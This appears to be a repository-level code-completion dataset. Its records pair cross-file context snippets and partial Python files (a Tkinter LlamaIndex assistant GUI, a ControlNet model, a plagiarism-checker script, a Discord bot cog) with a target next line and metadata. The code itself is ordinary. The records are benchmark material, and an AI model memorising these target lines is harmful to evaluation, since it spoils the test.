"snippet": "def init_llama_index(self, api_type):\n if self.isLlamaInitialized:\n return\n\n llm = None\n embed_model = None\n\n if api_type == \"azure\":\n is_valid = validate(self, [\n Properties.API_BASE,\n Properties.API_VERSION,\n Properties.API_KEY,\n Properties.GPT_MODEL,\n Properties.GPT_DEPLOYMENT,\n Properties.EMBEDDING_MODEL,\n Properties.EMBEDDING_DEPLOYMENT,\n ])\n if not is_valid:\n return\n\n api_base = self.settings_tab.api_host_entry.get()\n api_version = self.settings_tab.api_version_entry.get()\n api_key = self.settings_tab.api_key_entry.get()\n gpt_model_name = self.settings_tab.gpt_model.get()\n gpt_deployment_name = self.settings_tab.gpt_deployment.get()\n embedding_model_name = self.settings_tab.embeddings_model_entry.get()\n embedding_deployment_name = self.settings_tab.embeddings_deployment_entry.get()\n\n llm = AzureOpenAI(\n deployment_name=gpt_deployment_name,\n model=gpt_model_name,\n api_key=api_key,\n azure_endpoint=api_base,\n api_version=api_version\n )\n\n embed_model = AzureOpenAIEmbedding(\n model=embedding_model_name,\n deployment_name=embedding_deployment_name,\n api_key=api_key,\n azure_endpoint=api_base,\n api_version=api_version,\n )\n\n if api_type == \"openai\":\n is_valid = validate(self, [\n Properties.API_KEY,\n Properties.GPT_MODEL,\n Properties.EMBEDDING_MODEL,\n ])\n if not is_valid:\n return\n\n api_key = self.settings_tab.api_key_entry.get()\n gpt_model_name = self.settings_tab.gpt_model.get()\n embedding_model_name = self.settings_tab.embeddings_model_entry.get()\n\n llm = OpenAI(\n model=gpt_model_name,\n api_key=api_key\n )\n embed_model = OpenAIEmbedding(\n model=embedding_model_name,\n api_key=api_key,\n )\n\n if api_type == \"gemini\":\n is_valid = validate(self, [\n Properties.API_KEY,\n Properties.GPT_MODEL,\n Properties.EMBEDDING_MODEL,\n ])\n if not is_valid:\n return\n\n api_key = self.settings_tab.api_key_entry.get()\n gpt_model_name = self.settings_tab.gpt_model.get()\n embedding_model_name = self.settings_tab.embeddings_model_entry.get()\n\n llm = Gemini(\n model_name=gpt_model_name,\n api_key=api_key\n )\n embed_model = GeminiEmbedding(\n model_name=embedding_model_name,\n api_key=api_key,\n )\n\n if not llm or not embed_model:\n messagebox.showerror(\"Error\", \"Error occurred while initializing llama_index.\")\n return\n\n self.service_context = ServiceContext.from_defaults(\n llm=llm,\n embed_model=embed_model,\n )\n\n set_global_service_context(self.service_context)\n self.isLlamaInitialized = True"
},
{
"identifier": "question",
"path": "helpers/question.py",
"snippet": "def question(\n selected_project,\n task,\n is_new_chat,\n max_tokens,\n gui\n):\n # parse project name and project directory\n selected_project = selected_project.split(\" | \")\n project_name = selected_project[0]\n project_dir = selected_project[1]\n\n if is_new_chat:\n encoding = tiktoken.get_encoding(\"cl100k_base\")\n\n # rebuild storage context\n storage_context = StorageContext.from_defaults(persist_dir=\"./storage\")\n\n # load index\n index = load_index_from_storage(storage_context, project_name)\n retriever = index.as_retriever(similarity_top_k=25)\n\n # retrieve relevant documents\n nodes = retriever.retrieve(task)\n\n # add file structure to prompt:\n f = open(project_name + \"/project_files_structure.txt\", \"r\")\n system_message = \"Project file structure:\\n\\n\" + f.read() + \"\\n\\n\"\n\n # count tokens\n num_tokens = len(encoding.encode(task))\n # if chat is not new, then Project file structure is already inside messages\n if is_new_chat:\n num_tokens += len(encoding.encode(system_message))\n num_tokens += 5000 # add 5000 tokens wiggleroom for responses\n for message in gui.messages:\n num_tokens += len(encoding.encode(str(message)))\n\n # iterate over documents that were the best matches\n for node in nodes:\n file_name = node.metadata['file_name'][:-4].replace(\"___\", \"/\")\n\n # skip files that are not in project directory\n if file_name == \"project_files_structure\" or file_name == \"git_commit_hash\"\\\n or file_name == \"ignored_files\" or file_name == \"ignored_directories\":\n continue\n\n file_path = project_dir + \"/\" + file_name\n # open file and read contents\n with open(file_path, 'r') as file:\n file_contents = file.read()\n tokens = len(encoding.encode(file_contents))\n\n # stop adding files to context if max_tokens is reached\n if num_tokens + tokens > int(max_tokens):\n break\n\n num_tokens += tokens\n system_message += file_name + \":\\n'''\\n\" + file_contents + \"\\n'''\\n\"\n\n # ad task description to messages:\n gui.messages.append(\n ChatMessage(role=\"system\", content=system_message)\n )\n\n # ad task description to messages:\n gui.messages.append(\n ChatMessage(role=\"user\", content=task)\n )\n\n response = get_response(gui, gui.messages)\n\n gui.messages.append(response)\n\n gui.task_tab.loading_frame.place_forget()\n gui.task_tab.generation_response_frame.place(y=380, x=0, relwidth=1, height=900)\n gui.task_tab.load_web_page()\n return"
}
] | import os
import sys
import tempfile
import threading
import tkinter as tk
from tkinter import ttk, scrolledtext, messagebox
from llama_index.llms import ChatMessage
from gui.input_validator import Properties, validate
from gui.llama_index_init import init_llama_index
from helpers.question import question
from tkinterweb import HtmlFrame | 2,939 |
class TaskTab:
def __init__(self, root, frame):
self.frame = frame
self.root = root
# Task Requirements
ttk.Label(frame, text="Task Requirements:", style='W.Label').pack(fill=tk.X, padx=10, pady=(12, 2))
self.task_requirements_entry = scrolledtext.ScrolledText(frame, wrap=tk.WORD, height=7)
self.task_requirements_entry.configure(state='normal')
self.task_requirements_entry.pack(fill=tk.X, padx=10, pady=10)
# Select project
ttk.Label(frame, text="Selected Project:", style='W.Label').pack(fill=tk.X, padx=10, pady=2)
self.selected_project = ttk.Combobox(frame)
self.selected_project.pack(fill=tk.X, padx=10, pady=10)
# Run Generation Button
self.run_generation_button = ttk.Button(frame, text="Generate", command=self.generate_answer)
self.run_generation_button.pack(padx=10, pady=10)
# Clear chat Button
self.run_generation_button = ttk.Button(frame, text="Clear chat", command=self.clear_chat)
self.run_generation_button.pack(padx=10, pady=10)
# Generation Response Field
self.generation_response_frame = ttk.Frame(self.frame)
self.generation_response = HtmlFrame(self.generation_response_frame)
# Loading screen
self.loading_frame = ttk.Frame(self.frame)
self.loader = HtmlFrame(self.loading_frame)
self.load_loading_page()
def clear_chat(self):
self.root.messages = []
self.load_web_page()
def generate_answer(self):
|
class TaskTab:
def __init__(self, root, frame):
self.frame = frame
self.root = root
# Task Requirements
ttk.Label(frame, text="Task Requirements:", style='W.Label').pack(fill=tk.X, padx=10, pady=(12, 2))
self.task_requirements_entry = scrolledtext.ScrolledText(frame, wrap=tk.WORD, height=7)
self.task_requirements_entry.configure(state='normal')
self.task_requirements_entry.pack(fill=tk.X, padx=10, pady=10)
# Select project
ttk.Label(frame, text="Selected Project:", style='W.Label').pack(fill=tk.X, padx=10, pady=2)
self.selected_project = ttk.Combobox(frame)
self.selected_project.pack(fill=tk.X, padx=10, pady=10)
# Run Generation Button
self.run_generation_button = ttk.Button(frame, text="Generate", command=self.generate_answer)
self.run_generation_button.pack(padx=10, pady=10)
# Clear chat Button
self.run_generation_button = ttk.Button(frame, text="Clear chat", command=self.clear_chat)
self.run_generation_button.pack(padx=10, pady=10)
# Generation Response Field
self.generation_response_frame = ttk.Frame(self.frame)
self.generation_response = HtmlFrame(self.generation_response_frame)
# Loading screen
self.loading_frame = ttk.Frame(self.frame)
self.loader = HtmlFrame(self.loading_frame)
self.load_loading_page()
def clear_chat(self):
self.root.messages = []
self.load_web_page()
def generate_answer(self): | is_valid = validate(self.root, [ | 1 | 2023-12-15 14:06:38+00:00 | 4k |
quocanh34/magic-animate-modified | magicanimate/models/controlnet.py | [
{
"identifier": "TimestepEmbedding",
"path": "magicanimate/models/embeddings.py",
"snippet": "class TimestepEmbedding(nn.Module):\n def __init__(\n self,\n in_channels: int,\n time_embed_dim: int,\n act_fn: str = \"silu\",\n out_dim: int = None,\n post_act_fn: Optional[str] = None,\n cond_proj_dim=None,\n ):\n super().__init__()\n\n self.linear_1 = nn.Linear(in_channels, time_embed_dim)\n\n if cond_proj_dim is not None:\n self.cond_proj = nn.Linear(cond_proj_dim, in_channels, bias=False)\n else:\n self.cond_proj = None\n\n if act_fn == \"silu\":\n self.act = nn.SiLU()\n elif act_fn == \"mish\":\n self.act = nn.Mish()\n elif act_fn == \"gelu\":\n self.act = nn.GELU()\n else:\n raise ValueError(f\"{act_fn} does not exist. Make sure to define one of 'silu', 'mish', or 'gelu'\")\n\n if out_dim is not None:\n time_embed_dim_out = out_dim\n else:\n time_embed_dim_out = time_embed_dim\n self.linear_2 = nn.Linear(time_embed_dim, time_embed_dim_out)\n\n if post_act_fn is None:\n self.post_act = None\n elif post_act_fn == \"silu\":\n self.post_act = nn.SiLU()\n elif post_act_fn == \"mish\":\n self.post_act = nn.Mish()\n elif post_act_fn == \"gelu\":\n self.post_act = nn.GELU()\n else:\n raise ValueError(f\"{post_act_fn} does not exist. Make sure to define one of 'silu', 'mish', or 'gelu'\")\n\n def forward(self, sample, condition=None):\n if condition is not None:\n sample = sample + self.cond_proj(condition)\n sample = self.linear_1(sample)\n\n if self.act is not None:\n sample = self.act(sample)\n\n sample = self.linear_2(sample)\n\n if self.post_act is not None:\n sample = self.post_act(sample)\n return sample"
},
{
"identifier": "Timesteps",
"path": "magicanimate/models/embeddings.py",
"snippet": "class Timesteps(nn.Module):\n def __init__(self, num_channels: int, flip_sin_to_cos: bool, downscale_freq_shift: float):\n super().__init__()\n self.num_channels = num_channels\n self.flip_sin_to_cos = flip_sin_to_cos\n self.downscale_freq_shift = downscale_freq_shift\n\n def forward(self, timesteps):\n t_emb = get_timestep_embedding(\n timesteps,\n self.num_channels,\n flip_sin_to_cos=self.flip_sin_to_cos,\n downscale_freq_shift=self.downscale_freq_shift,\n )\n return t_emb"
}
] | from dataclasses import dataclass
from typing import Any, Dict, List, Optional, Tuple, Union
from torch import nn
from torch.nn import functional as F
from diffusers.configuration_utils import ConfigMixin, register_to_config
from diffusers.utils import BaseOutput, logging
from .embeddings import TimestepEmbedding, Timesteps
from diffusers.models.modeling_utils import ModelMixin
from diffusers.models.unet_2d_blocks import (
CrossAttnDownBlock2D,
DownBlock2D,
UNetMidBlock2DCrossAttn,
get_down_block,
)
from diffusers.models.unet_2d_condition import UNet2DConditionModel
import torch | 2,195 |
logger = logging.get_logger(__name__) # pylint: disable=invalid-name
@dataclass
class ControlNetOutput(BaseOutput):
down_block_res_samples: Tuple[torch.Tensor]
mid_block_res_sample: torch.Tensor
class ControlNetConditioningEmbedding(nn.Module):
"""
Quoting from https://arxiv.org/abs/2302.05543: "Stable Diffusion uses a pre-processing method similar to VQ-GAN
[11] to convert the entire dataset of 512 × 512 images into smaller 64 × 64 “latent images” for stabilized
training. This requires ControlNets to convert image-based conditions to 64 × 64 feature space to match the
convolution size. We use a tiny network E(·) of four convolution layers with 4 × 4 kernels and 2 × 2 strides
(activated by ReLU, channels are 16, 32, 64, 128, initialized with Gaussian weights, trained jointly with the full
model) to encode image-space conditions ... into feature maps ..."
"""
def __init__(
self,
conditioning_embedding_channels: int,
conditioning_channels: int = 3,
block_out_channels: Tuple[int] = (16, 32, 96, 256),
):
super().__init__()
self.conv_in = nn.Conv2d(conditioning_channels, block_out_channels[0], kernel_size=3, padding=1)
self.blocks = nn.ModuleList([])
for i in range(len(block_out_channels) - 1):
channel_in = block_out_channels[i]
channel_out = block_out_channels[i + 1]
self.blocks.append(nn.Conv2d(channel_in, channel_in, kernel_size=3, padding=1))
self.blocks.append(nn.Conv2d(channel_in, channel_out, kernel_size=3, padding=1, stride=2))
self.conv_out = zero_module(
nn.Conv2d(block_out_channels[-1], conditioning_embedding_channels, kernel_size=3, padding=1)
)
def forward(self, conditioning):
embedding = self.conv_in(conditioning)
embedding = F.silu(embedding)
for block in self.blocks:
embedding = block(embedding)
embedding = F.silu(embedding)
embedding = self.conv_out(embedding)
return embedding
class ControlNetModel(ModelMixin, ConfigMixin):
_supports_gradient_checkpointing = True
@register_to_config
def __init__(
self,
in_channels: int = 4,
flip_sin_to_cos: bool = True,
freq_shift: int = 0,
down_block_types: Tuple[str] = (
"CrossAttnDownBlock2D",
"CrossAttnDownBlock2D",
"CrossAttnDownBlock2D",
"DownBlock2D",
),
only_cross_attention: Union[bool, Tuple[bool]] = False,
block_out_channels: Tuple[int] = (320, 640, 1280, 1280),
layers_per_block: int = 2,
downsample_padding: int = 1,
mid_block_scale_factor: float = 1,
act_fn: str = "silu",
norm_num_groups: Optional[int] = 32,
norm_eps: float = 1e-5,
cross_attention_dim: int = 1280,
attention_head_dim: Union[int, Tuple[int]] = 8,
use_linear_projection: bool = False,
class_embed_type: Optional[str] = None,
num_class_embeds: Optional[int] = None,
upcast_attention: bool = False,
resnet_time_scale_shift: str = "default",
projection_class_embeddings_input_dim: Optional[int] = None,
controlnet_conditioning_channel_order: str = "rgb",
conditioning_embedding_out_channels: Optional[Tuple[int]] = (16, 32, 96, 256),
):
super().__init__()
# Check inputs
if len(block_out_channels) != len(down_block_types):
raise ValueError(
f"Must provide the same number of `block_out_channels` as `down_block_types`. `block_out_channels`: {block_out_channels}. `down_block_types`: {down_block_types}."
)
if not isinstance(only_cross_attention, bool) and len(only_cross_attention) != len(down_block_types):
raise ValueError(
f"Must provide the same number of `only_cross_attention` as `down_block_types`. `only_cross_attention`: {only_cross_attention}. `down_block_types`: {down_block_types}."
)
if not isinstance(attention_head_dim, int) and len(attention_head_dim) != len(down_block_types):
raise ValueError(
f"Must provide the same number of `attention_head_dim` as `down_block_types`. `attention_head_dim`: {attention_head_dim}. `down_block_types`: {down_block_types}."
)
# input
conv_in_kernel = 3
conv_in_padding = (conv_in_kernel - 1) // 2
self.conv_in = nn.Conv2d(
in_channels, block_out_channels[0], kernel_size=conv_in_kernel, padding=conv_in_padding
)
# time
time_embed_dim = block_out_channels[0] * 4
self.time_proj = Timesteps(block_out_channels[0], flip_sin_to_cos, freq_shift)
timestep_input_dim = block_out_channels[0]
| # *************************************************************************
# This file may have been modified by Bytedance Inc. (“Bytedance Inc.'s Mo-
# difications”). All Bytedance Inc.'s Modifications are Copyright (2023) B-
# ytedance Inc..
# *************************************************************************
# Copyright 2023 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
logger = logging.get_logger(__name__) # pylint: disable=invalid-name
@dataclass
class ControlNetOutput(BaseOutput):
down_block_res_samples: Tuple[torch.Tensor]
mid_block_res_sample: torch.Tensor
class ControlNetConditioningEmbedding(nn.Module):
"""
Quoting from https://arxiv.org/abs/2302.05543: "Stable Diffusion uses a pre-processing method similar to VQ-GAN
[11] to convert the entire dataset of 512 × 512 images into smaller 64 × 64 “latent images” for stabilized
training. This requires ControlNets to convert image-based conditions to 64 × 64 feature space to match the
convolution size. We use a tiny network E(·) of four convolution layers with 4 × 4 kernels and 2 × 2 strides
(activated by ReLU, channels are 16, 32, 64, 128, initialized with Gaussian weights, trained jointly with the full
model) to encode image-space conditions ... into feature maps ..."
"""
def __init__(
self,
conditioning_embedding_channels: int,
conditioning_channels: int = 3,
block_out_channels: Tuple[int] = (16, 32, 96, 256),
):
super().__init__()
self.conv_in = nn.Conv2d(conditioning_channels, block_out_channels[0], kernel_size=3, padding=1)
self.blocks = nn.ModuleList([])
for i in range(len(block_out_channels) - 1):
channel_in = block_out_channels[i]
channel_out = block_out_channels[i + 1]
self.blocks.append(nn.Conv2d(channel_in, channel_in, kernel_size=3, padding=1))
self.blocks.append(nn.Conv2d(channel_in, channel_out, kernel_size=3, padding=1, stride=2))
self.conv_out = zero_module(
nn.Conv2d(block_out_channels[-1], conditioning_embedding_channels, kernel_size=3, padding=1)
)
def forward(self, conditioning):
embedding = self.conv_in(conditioning)
embedding = F.silu(embedding)
for block in self.blocks:
embedding = block(embedding)
embedding = F.silu(embedding)
embedding = self.conv_out(embedding)
return embedding
class ControlNetModel(ModelMixin, ConfigMixin):
_supports_gradient_checkpointing = True
@register_to_config
def __init__(
self,
in_channels: int = 4,
flip_sin_to_cos: bool = True,
freq_shift: int = 0,
down_block_types: Tuple[str] = (
"CrossAttnDownBlock2D",
"CrossAttnDownBlock2D",
"CrossAttnDownBlock2D",
"DownBlock2D",
),
only_cross_attention: Union[bool, Tuple[bool]] = False,
block_out_channels: Tuple[int] = (320, 640, 1280, 1280),
layers_per_block: int = 2,
downsample_padding: int = 1,
mid_block_scale_factor: float = 1,
act_fn: str = "silu",
norm_num_groups: Optional[int] = 32,
norm_eps: float = 1e-5,
cross_attention_dim: int = 1280,
attention_head_dim: Union[int, Tuple[int]] = 8,
use_linear_projection: bool = False,
class_embed_type: Optional[str] = None,
num_class_embeds: Optional[int] = None,
upcast_attention: bool = False,
resnet_time_scale_shift: str = "default",
projection_class_embeddings_input_dim: Optional[int] = None,
controlnet_conditioning_channel_order: str = "rgb",
conditioning_embedding_out_channels: Optional[Tuple[int]] = (16, 32, 96, 256),
):
super().__init__()
# Check inputs
if len(block_out_channels) != len(down_block_types):
raise ValueError(
f"Must provide the same number of `block_out_channels` as `down_block_types`. `block_out_channels`: {block_out_channels}. `down_block_types`: {down_block_types}."
)
if not isinstance(only_cross_attention, bool) and len(only_cross_attention) != len(down_block_types):
raise ValueError(
f"Must provide the same number of `only_cross_attention` as `down_block_types`. `only_cross_attention`: {only_cross_attention}. `down_block_types`: {down_block_types}."
)
if not isinstance(attention_head_dim, int) and len(attention_head_dim) != len(down_block_types):
raise ValueError(
f"Must provide the same number of `attention_head_dim` as `down_block_types`. `attention_head_dim`: {attention_head_dim}. `down_block_types`: {down_block_types}."
)
# input
conv_in_kernel = 3
conv_in_padding = (conv_in_kernel - 1) // 2
self.conv_in = nn.Conv2d(
in_channels, block_out_channels[0], kernel_size=conv_in_kernel, padding=conv_in_padding
)
# time
time_embed_dim = block_out_channels[0] * 4
self.time_proj = Timesteps(block_out_channels[0], flip_sin_to_cos, freq_shift)
timestep_input_dim = block_out_channels[0]
| self.time_embedding = TimestepEmbedding( | 0 | 2023-12-15 01:22:37+00:00 | 4k |
KR1470R/plagiator-py | main.py | [
{
"identifier": "exists",
"path": "utils/exists.py",
"snippet": "def exists(obj, *keys):\n format_keys = \"\".join(\n list(map(\n lambda key: f\"['{key}']\",\n keys\n ))\n )\n try:\n return eval(f\"obj{format_keys}\")\n except Exception:\n return None"
},
{
"identifier": "Plagiator",
"path": "utils/plagiator.py",
"snippet": "class Plagiator:\n def __init__(self):\n self.session = requests.Session()\n adapter = requests.adapters.HTTPAdapter(pool_connections=10000, pool_maxsize=10000)\n self.session.mount(\"https://\", adapter)\n software_names = [software_name.value for software_name in SoftwareName]\n operating_systems = [operating_system.value for operating_system in OperatingSystem]\n self.user_agent_rotator = UserAgent(\n software_names=software_names, \n operating_systems=operating_systems, \n limit=1000\n )\n\n def concretize_response(self, response: dict):\n if exists(response, \"error\") and response[\"error\"]:\n return response\n del response[\"error\"]\n del response[\"error_code\"]\n if len(response[\"title\"]) == 0:\n del response[\"title\"]\n words = response[\"text\"].split(\" \")\n if exists(response, \"highlight\") and len(response[\"highlight\"]):\n highlight_text = []\n for span in response[\"highlight\"]:\n span = list(map(int, span))\n selected_words = words[span[0]] if (\n span[0] == span[1]\n ) else words[span[0]:span[1]]\n if isinstance(selected_words, list):\n selected_words = \" \".join(selected_words)\n highlight_text.append(selected_words)\n response[\"highlight\"] = highlight_text\n if exists(response, \"matches\") and len(response[\"matches\"]):\n matches_highlight = []\n for match in response[\"matches\"]:\n matched_highlight_text = []\n for match_span in match[\"highlight\"]:\n match_span = list(map(int, match_span))\n selected_words = words[match_span[0]] if (\n match_span[0] == match_span[1]\n ) else words[match_span[0]:match_span[1]]\n if isinstance(selected_words, list):\n selected_words = \" \".join(selected_words)\n matched_highlight_text.append(selected_words)\n matches_highlight.append({**match, \"highlight\": matched_highlight_text})\n response[\"matches\"] = matches_highlight\n return response\n\n def __request__(self, text: str, title: str = None):\n return self.session.post(\n API_URI, \n headers={\n **HEADERS,\n \"User-Agent\": self.user_agent_rotator.get_random_user_agent()\n },\n params={\n \"is_free\": \"true\",\n \"plagchecker_locale\": \"ua\",\n \"title\": title or \"\",\n \"text\": text\n }\n )\n\n def process(self, text: str, title: str = None):\n try:\n api_response = self.__request__(text, title)\n api_response.raise_for_status()\n jsonify = json.loads(api_response.content.decode(\"unicode-escape\"))\n error_code = jsonify[\"error_code\"]\n if error_code and int(error_code) > 0:\n if exists(jsonify, \"error\"):\n message = jsonify[\"error\"]\n elif exists(jsonify, \"message\"):\n message = jsonify[\"message\"]\n else: message = \"\"\n logging.warning(\n f\"REQUEST RETURNED ERROR WITH STATUS {error_code}: \" +\\\n f\"{message}\\n\" +\\\n f\"{text}\"\n )\n except Exception as err:\n skip_err_msg = \"The action you just performed triggered the security solution.\"\n if skip_err_msg in api_response.decode():\n return\n logging.error(f\"REQUEST ERROR: {repr(err)}:{api_response.content}\")\n try:\n return {\"error\": api_response.content.decode()}\n except Exception:\n return {\"error\": \"something went wrong\"}\n return self.concretize_response(jsonify)"
},
{
"identifier": "split_chunks",
"path": "utils/split_chunks.py",
"snippet": "def split_chunks(text:str, words_per_chunk: int = 100):\n words = text.split(\" \")\n logging.info(f\"Words counted: {len(words)}\")\n logging.info(f\"Words per chunk: {words_per_chunk}\")\n chunks = []\n\n if len(words) <= words_per_chunk:\n chunks.append[words]\n else:\n while len(words):\n current_words_len = len(words)\n if current_words_len <= words_per_chunk:\n chunks.append(\" \".join(words[0:current_words_len]))\n del words[0:current_words_len]\n else:\n chunks.append(\" \".join(words[0:words_per_chunk]))\n del words[0:words_per_chunk]\n\n logging.info(f\"Splitted into {len(chunks)} chunks\")\n\n return chunks"
},
{
"identifier": "DocumentParser",
"path": "utils/document_parser.py",
"snippet": "class DocumentParser:\n def __init__(self):\n pass\n\n def extract_data(self, filepath):\n try:\n extension = Path(filepath).suffix\n extract_method = self.__ext_binds__(extension)\n result = self.__normilize__(extract_method(filepath))\n if result is None:\n raise Exception(\n f\"cannot extract text from '{file.actual_path}' - returned 'None'\"\n )\n return result\n except Exception as err:\n raise Exception(\n f\"extraction error: {err}\"\n )\n\n def __ext_binds__(self, ext):\n binds = {\n \".pdf\": self.__extract_text_from_pdf__,\n \".docx\": self.__extract_text_from_docx__,\n \".doc\": self.__extract_text_from_doc__,\n \".txt\": self.__extract_text_from_txt__\n }\n if ext not in binds:\n raise Exception(f\"Unsupportable document type: '{ext}'\")\n return binds[ext]\n\n def __normilize__(self, text):\n try:\n return normalize(\n \"NFKC\", \n re.sub(\n \"\\u0000\", \n \"\", \n re.sub(\n \"\\s+|\\n+\",\n \" \",\n re.sub(\"\\.+\", \" \", text)\n )\n )\n )\n except Exception as err:\n raise Exception(f\"normalization error: {repr(err)}\")\n\n def __extract_text_from_doc__(self, doc_path):\n try:\n return textract.process(doc_path).decode('utf-8')\n except KeyError:\n return None\n\n def __extract_text_from_docx__(self, docx_path):\n try:\n temp = docx2txt.process(docx_path)\n text = [line.replace('\\t', ' ') for line in temp.split('\\n') if line]\n return ' '.join(text)\n except KeyError:\n return None\n\n def __extract_text_from_pdf__(self, pdf_path: str):\n try:\n reader = PdfReader(pdf_path)\n number_of_pages = len(reader.pages)\n text = \"\"\n page = reader.pages[0]\n for page in reader.pages:\n text += page.extract_text()\n return text\n except Exception:\n return None\n\n def __extract_text_from_txt__(self, txt_path):\n try:\n with open(txt_path, \"r\") as f:\n return \"\\n\".join(str(i) for i in f.readlines())\n except Exception:\n return None"
}
] | import sys
import json
import dotenv
import logging
import concurrent.futures
from time import sleep
from random import randint
from utils.exists import exists
from os import getenv, path, curdir, mkdir
from utils.plagiator import Plagiator
from utils.split_chunks import split_chunks
from utils.document_parser import DocumentParser | 1,978 |
dotenv.load_dotenv(path.abspath(path.join(
curdir, "configs", ".env"
)))
logging.basicConfig(level=logging.INFO)
try:
docpath_arg = sys.argv[1]
except Exception:
docpath_arg = None
document_path = docpath_arg or getenv("DOC_PATH") or input(
"""
Enter absolute path to your document
Supported formats:
- .doc
- .docx
- .pdf
- .txt
-> """
)
words_per_chunk = int(getenv("WORDS_PER_CHUNK") or 100)
result_target_filename = path.basename(document_path).split(".")[0] + ".json"
result_folder = path.join(curdir, "results")
|
dotenv.load_dotenv(path.abspath(path.join(
curdir, "configs", ".env"
)))
logging.basicConfig(level=logging.INFO)
try:
docpath_arg = sys.argv[1]
except Exception:
docpath_arg = None
document_path = docpath_arg or getenv("DOC_PATH") or input(
"""
Enter absolute path to your document
Supported formats:
- .doc
- .docx
- .pdf
- .txt
-> """
)
words_per_chunk = int(getenv("WORDS_PER_CHUNK") or 100)
result_target_filename = path.basename(document_path).split(".")[0] + ".json"
result_folder = path.join(curdir, "results") | if not path.exists(result_folder): | 0 | 2023-12-21 17:29:18+00:00 | 4k |
fmhy/bot | cogs/events.py | [
{
"identifier": "channel_ids",
"path": "cogs/_config.py",
"snippet": "TOKEN = os.getenv(\"TOKEN\", None)\nGUILD_ID = os.getenv(\"GUILD_ID\", None)\nOWNERS = os.getenv(\"OWNERS\").split(\",\")\nRSS_CHANNELS = os.getenv(\"RSS_CHANNEL_IDS\", None)\nFEEDS = os.getenv(\"RSS_FEED_URLS\", None)\nDB = os.getenv(\"db_uri\")\n OWNERS: list[str]\n FEEDS: str\n RSS_CHANNELS: str\n TOKEN: str"
},
{
"identifier": "cembed",
"path": "cogs/_helpers.py",
"snippet": "def cembed(title, description, **kwargs):\n return discord.Embed(\n title=title,\n description=description,\n color=discord.Color.green(),\n timestamp=datetime.now(),\n **kwargs,\n )"
},
{
"identifier": "Bot",
"path": "main.py",
"snippet": "class Bot(commands.Bot):\n def __init__(self) -> None:\n self.start_time = datetime.datetime.now(datetime.UTC)\n intents = discord.Intents.all()\n\n super().__init__(\n command_prefix=commands.when_mentioned_or(prefix),\n intents=intents,\n help_command=help.HelpMenu(),\n case_insensitive=True,\n )\n\n self.session: aiohttp.ClientSession\n formatter.install(\"discord\", \"INFO\")\n formatter.install(\"bot\", \"INFO\")\n self.logger = logging.getLogger(\"discord\")\n self.logger = logging.getLogger(\"bot\")\n\n async def setup_hook(self):\n await self.load_extension(\"jishaku\")\n await self.load_cogs()\n\n async def load_cogs(self):\n s = time.perf_counter()\n for file in os.listdir(\"cogs/\"):\n if file.endswith(\".py\") and not file.startswith(\"_\"):\n extension = f\"cogs.{file[:-3]}\"\n try:\n await self.load_extension(extension)\n self.logger.info(f\"Loaded - {extension}\")\n except Exception as e:\n exception = f\"{type(e).__name__}: {e}\"\n self.logger.exception(\n f\"Failed to load extension {extension}. - {exception}\")\n traceback.print_exc()\n\n elapsed = time.perf_counter() - s\n self.logger.info(f\"Loaded all extensions - took {elapsed:.2f}s\")\n\n async def is_owner(self, user: discord.abc.User):\n if user.id in OWNERS:\n return True\n # Else fall back to the original\n return await super().is_owner(user)\n\n async def on_ready(self) -> None:\n self.session = aiohttp.ClientSession(loop=self.loop)\n await self.change_presence(activity=discord.Game(name=\"Free Media Heck Yeah\"))\n self.logger.info(\"Bot is ready!\")"
}
] | import re
import time
import discord
from datetime import datetime
from discord.ext import commands, tasks
from cogs._config import channel_ids, managing_roles, url_regex, auto_thread_channels, auto_thread_roles
from cogs._helpers import cembed
from main import Bot | 1,861 |
return duplicate_links, non_duplicate_links
@commands.Cog.listener()
async def on_ready(self):
self.update_single_page.start()
dead_sites_channel = self.bot.get_channel(988133247575810059)
if dead_sites_channel:
self.dead_sites_messages = set(await dead_sites_channel.history(limit=None).flatten())
deleted_sites_channel = self.bot.get_channel(986617857133649921)
if deleted_sites_channel:
self.deleted_sites_messages = set(
await deleted_sites_channel.history(limit=None).flatten()
)
@commands.Cog.listener()
async def on_message(self, message: discord.Message):
if message.channel.id in auto_thread_channels and any(
str(role) in message.content for role in auto_thread_roles
):
await message.create_thread(
name="Auto-Thread - Please keep discussions in here!",
reason="Auto thread created by FMHY Bot")
if message.author.bot:
return
if message.channel.id in channel_ids:
message_links = set(re.findall(url_regex, message.content))
if message_links:
(
duplicate_links,
non_duplicate_links,
) = await self.get_duplicate_non_duplicate_links(message_links)
# One link, duplicate
if len(message_links) == 1 and len(duplicate_links) == 1:
reply_message = await message.reply("**This link is already in the wiki!**")
await reply_message.add_reaction("❌")
return
# All links, duplicates
elif len(message_links) > 1 and len(message_links) == len(duplicate_links):
reply_message = await message.reply(
"**All of these links are already in the wiki!**"
)
await reply_message.add_reaction("❌")
return
# Partial duplicates
elif len(message_links) > 1 and len(duplicate_links) >= 1:
non_duplicate_links_string = "\n".join(
[f"{protocol}://{link}" for protocol,
link in non_duplicate_links]
)
non_duplicate_links_embed = cembed(
title="__Non-Duplicate Links:__",
description=f"{non_duplicate_links_string}",
)
non_duplicate_links_embed.set_author(
name=message.author.name,
icon_url=message.author.display_avatar,
)
reply_message = await message.reply(embed=non_duplicate_links_embed)
await reply_message.add_reaction("❌")
return
@commands.Cog.listener()
async def on_raw_reaction_add(self, payload):
emoji = payload.emoji
chan_id = payload.channel_id
msg_id = payload.message_id
channel = await self.bot.fetch_channel(chan_id)
msg: discord.Message = await channel.fetch_message(msg_id)
user = await self.bot.fetch_user(payload.user_id)
if not isinstance(channel, discord.DMChannel):
# Bookmark message
if emoji == self.bookmark_emoji:
attachments = msg.attachments
embed = discord.Embed(color=0x2B2D31, timestamp=datetime.now())
embed.set_author(name=msg.author.name,
icon_url=msg.author.display_avatar)
embed.description = msg.content[:4096]
embed.add_field(
name="Jump", value=f"[Go to Message!]({msg.jump_url})")
embed.set_footer(
text=f"Guild: {channel.guild.name} | Channel: #{channel.name}")
attach = ""
if attachments:
img_added = False
for attachment in attachments:
if img_added is False:
if attachment.content_type in [
"image/avif",
"image/jpeg",
"image/png",
]:
try:
embed.set_image(url=attachment.url)
except:
pass
img_added = True
attach += f"{attachment.url}\n"
try:
